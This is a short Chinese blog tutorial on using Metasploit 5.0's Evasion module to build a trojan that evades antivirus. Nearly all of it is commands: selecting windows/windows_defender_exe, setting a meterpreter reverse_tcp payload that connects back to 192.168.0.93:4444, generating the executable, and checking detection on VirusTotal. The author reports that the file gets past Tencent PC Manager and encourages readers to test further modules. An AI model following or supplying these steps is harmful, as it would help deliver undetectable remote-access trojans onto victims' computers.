5.0中有一个新的模块叫Evasion模块,这个模块可以轻松的创建反杀毒软件的木马,今天我们就来试一试
首先我们启动msfconsole
service postgresql start
msfconsole
查看evasion模块
show evasion
使用windows/windows_defender_exe
这个模块
use windows/windows_defender_exe
查看要配置的参数
show options
就一个文件名参数可以配置
set FILENAME bbskali.exe
生成shell
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.0.93
set LPORT 4444
exploit
注意生成的目录
免杀测试
https://www.virustotal.com/
效果如下:
电脑管家
这里仅仅对其中的一个模块进行了测试,感觉效果还是可以。毕竟是msf自带的模块。后面的模块,你们自行测试吧!